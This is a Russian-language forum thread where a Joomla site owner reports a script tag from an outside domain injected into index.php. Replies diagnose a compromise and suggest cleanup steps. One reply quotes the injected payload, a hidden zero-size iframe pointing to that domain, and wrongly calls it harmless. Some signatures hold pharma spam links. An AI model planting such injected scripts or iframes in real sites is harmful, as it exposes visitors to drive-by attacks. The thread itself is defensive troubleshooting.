Форум Сайтостроение Веб-строительство

Как проверить сайт на взлом?

D
На сайте с 06.02.2011
Offline
12
Dovma
8187

Вчера вечером из яндекс.метрики приходит письмо о том, что мой сайт не доступен. Я обращаюсь в службу поддержки хостера, там мне отвечают сто на хостинге все в порядке проверьте сам сайт, для вывода ошибок добавьте код

php_value display_errors 1

php_value error_reporting 2047

в файл .htaccess. После добавления кода сайт выдал синтаксическую ошибку в файле index.php в корне сайта (сайт на джумле) в последней строке.

Строка следующая : <script src="http://byhosted.com/ajaxengine.js"></script>

Как туда попала эта строка ума не приложу...

Может сайт взломали? Как это можно проверить?

Ragnarok
На сайте с 25.06.2010
Offline
239
Ragnarok
#1
Dovma:
Вчера вечером из яндекс.метрики приходит письмо о том, что мой сайт не доступен. Я обращаюсь в службу поддержки хостера, там мне отвечают сто на хостинге все в порядке проверьте сам сайт, для вывода ошибок добавьте код
php_value display_errors 1
php_value error_reporting 2047
в файл .htaccess. После добавления кода сайт выдал синтаксическую ошибку в файле index.php в корне сайта (сайт на джумле) в последней строке.
Строка следующая : <script src="http://byhosted.com/ajaxengine.js"></script>
Как туда попала эта строка ума не приложу...
Может сайт взломали? Как это можно проверить?

взломали,типа того.

проверь комп на вирусы, обновляй движок и меняй пароли на фтп.

//TODO: перестать откладывать на потом
dino_spomoni
На сайте с 09.06.2007
Offline
632
dino_spomoni
#2

Меняй пароли фтп.

#1 ФАРМ партнёрка, API, 80%+ АПРУВ! Мега крутой конверт, льем всю фарму! -> https://bit.ly/3EvLxX8 | Профи в фарме? Тебе в Union Pharm! -> https://u.to/aXwsIg | PharmEmpire - ТОП Конверт фарма трафика!!! -> https://clck.ru/QrgKx | Рассылки цифровых сообщений и на WhatsApp! -> https://bit.ly/3FVSDYb
RM
На сайте с 21.06.2011
Offline
77
RoMaN444Ik
#3

Ну, тут даже думать нечего. Взломали. Проверяйте домашний комп на вирусы, меняйте все пароли и найдите специалиста по удалению шеллов из джумлы.

Ragnarok
На сайте с 25.06.2010
Offline
239
Ragnarok
#4
dino_spomoni:
Меняй пароли фтп.

без проверки на вирусы пк и обновления файлов -- будет просто слив новых паролей

[Удален]
#5

В этом коде ничего страшного нет 

document.write('<iframe width="0" height="0" frameborder="0" src="http://byhosted.com/www.bing.com/robots.txt" style="position:relative; left:-980px; opacity:0; -moz-opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0)"></iframe>');

http://byhosted.com/www.bing.com/robots.txt 

User-agent: *

Disallow: /bmi/

Disallow: /BVFrame.aspx

Disallow: /BVSandbox.aspx

Disallow: /cashback/admin

Disallow: /cashback/go

Disallow: /challenge

Disallow: /community/forums/tags

Disallow: /community/login.aspx?

Disallow: /fd/

Disallow: /history

Disallow: /images/search?

Disallow: /images?

Disallow: /kids/

Disallow: /maps/clicks.ashx?

Disallow: /math/

Allow: /news/search?*p1=%5bNewsVertical+Category%3d*%5d

Disallow: /news/search?

Disallow: /nutrition/

Disallow: /previewx

Disallow: /products/?q

Disallow: /products/accelerator

Disallow: /products/search?q

Disallow: /profile/

Disallow: /Proxy.ashx

Disallow: /results

Disallow: /search

Disallow: /Search

Disallow: /settings

Disallow: /shopping/*/c/*?q

Disallow: /shopping/*/search

Disallow: /shopping/accelerator

Disallow: /shopping/cashback/go

Disallow: /shopping/cashback/search?q

Disallow: /shopping/sa/

Disallow: /shopping/search?

Disallow: /shopping/twitter

Disallow: /social/search?

Disallow: /spbasic

Disallow: /spresults

Disallow: /static/

Disallow: /travel/css

Disallow: /travel/flight/flightSearch

Disallow: /travel/flight/flightSearchAction

Disallow: /travel/hotel/hotelMiniSearchRequest

Disallow: /travel/hotel/hotelSearch

Disallow: /travel/scripts

Disallow: /travel/secure

Disallow: /twitter/search?

Disallow: /videos/search?

Disallow: /videos?

Disallow: /w3c/

Disallow: /xrank/search?





Sitemap: http://sitemap.video.msn.com/sitemap/sitemap-en-us-index.xml

Sitemap: http://www.bing.com/browse/sitemap.xml

Sitemap: http://www.bing.com/finance/sitemapIndex.xml

Sitemap: http://www.bing.com/ges/2/sitemap.xml

Sitemap: http://www.bing.com/music/sitemaps.xml

Sitemap: http://www.bing.com/news/sitemap.xml

Sitemap: http://www.bing.com/shopping/static/sitemapindex.xml

Sitemap: http://www.bing.com/travel/sitemap.xml

Sitemap: http://www.bing.com/travel/sitemap/sitemapDestinations

Возможно код изначально там был?

LEOnidUKG
На сайте с 25.11.2006
Offline
1762
LEOnidUKG
#6

dyakoff, а вы не подумали, что это просто затравка и сбор инфы, что и где взломано.

А уже потом начинается веселье, когда собрана база.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий